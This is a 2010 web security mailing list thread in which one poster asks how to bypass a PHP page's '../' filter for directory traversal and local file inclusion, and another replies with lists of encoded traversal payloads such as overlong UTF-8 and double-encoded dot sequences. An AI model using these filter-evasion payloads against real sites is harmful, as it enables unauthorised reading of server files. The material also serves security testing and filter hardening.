[WEB SECURITY] ../ filtered

Shlomi Narkolayev shlominar at gmail.com
Mon Feb 22 04:51:06 EST 2010


If ".." is rejected, so try these:
 %c0%ae%c0%ae\FILENAME
%uff0e%uff0e/FILENAME
%c0%ae%c0%ae/FILENAME
%2e%2e%5cFILENAME
%2e%2e\%2e%2e\FILENAME
%2e%2e%2fFILENAME

If you still need more combinations, check my
blog<http://narkolayev-shlomi.blogspot.com/>in a few days for the full
list.


Kind Regards,
Narkolayev Shlomi.




*From:* Beatriz Duran [mailto:beatrizdrn at yahoo.com]
*Sent:* Tuesday, February 16, 2010 4:40 PM
*To:* Shlomi Narkolayev; websecurity at webappsec.org
*Subject:* Re: [WEB SECURITY] ../ filtered



Shlomi,

I tried those already; but they and the ones with ".." are rejected, the
variable is verifying the string before running it and with the combination:


%252e%252e/FILENAME happens this:

viewfiles.php?folder=%252e%252e/

The 25s are removed, the so the %2e%2e are left but transformed in pure text
so the page reports that the directory %2e%2e doesn't exist; but if I apply
purely  viewfiles.php?folder=%2e%2e/ the page reject them and say .. are not
allowed.






I Have Learned So much from God That I can no longer Call Myself A
Christian, a Hindu, a Muslim A Buddhist, a Jew. The Truth has shared so much
of Itself With me That I can no longer call myself A man, a woman, and angel
Or even pure Soul. Love has Befriended Hafiz so completely It has turned to
ash And freed Me Of every concept and image My mind has ever known. –Hafiz,
Persian poet (1315 – 1390)




 ------------------------------

*From:* Shlomi Narkolayev <shlominar at gmail.com>
*To:* beatrizdrn at yahoo.com; websecurity at webappsec.org
*Sent:* Tue, February 16, 2010 12:41:16 AM
*Subject:* RE: [WEB SECURITY] ../ filtered

Try these:
..%5c..%5cFILENAME
%2e%2e\%2e%2e\FILENAME
..%c0%af..%c0%afFILENAME
..%255c..%255cFILENAME
%252e%252e/FILENAME
..%2f..%2fFILENAME
..%252f..%252fFILENAME


Soon I'll upload to my blog <http://narkolayev-shlomi.blogspot.com/> new
1400 variants for directory traversal.

Kind Regards,
Narkolayev Shlomi.



*From:** Beatriz Duran [mailto:beatrizdrn at yahoo.com]
Sent: Monday, February 15, 2010 9:43 AM
To: websecurity at webappsec.org
Subject: [WEB SECURITY] ../ filtered*



Hi, I need to find a vulnerability in a url that could be exploited for
directory traversal and LFI; the page is working with PHP but it is
filtering /../ and also /%2e%2e/, because the pace is  using ISO for Latin
characters I can't use unicode extended because it reinterpret with other
values; is there another way to work around the filter?
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/attachments/20100222/88bc9042/attachment.html>


More information about the websecurity mailing list